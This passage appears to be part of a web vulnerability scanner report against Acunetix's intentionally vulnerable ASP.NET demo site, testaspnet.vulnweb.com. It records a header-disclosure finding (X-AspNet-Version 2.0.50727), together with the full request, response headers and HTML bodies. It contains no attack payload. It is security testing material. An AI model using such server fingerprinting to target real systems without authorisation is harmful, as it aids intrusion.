gYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8M7PLE5RqS1nNbgt2x8WWJp0h2GA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (455 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6567 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (6567 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bdfic04fJFrwdgOeBd3JBjK63E5g%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 22784Response body (22784 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gb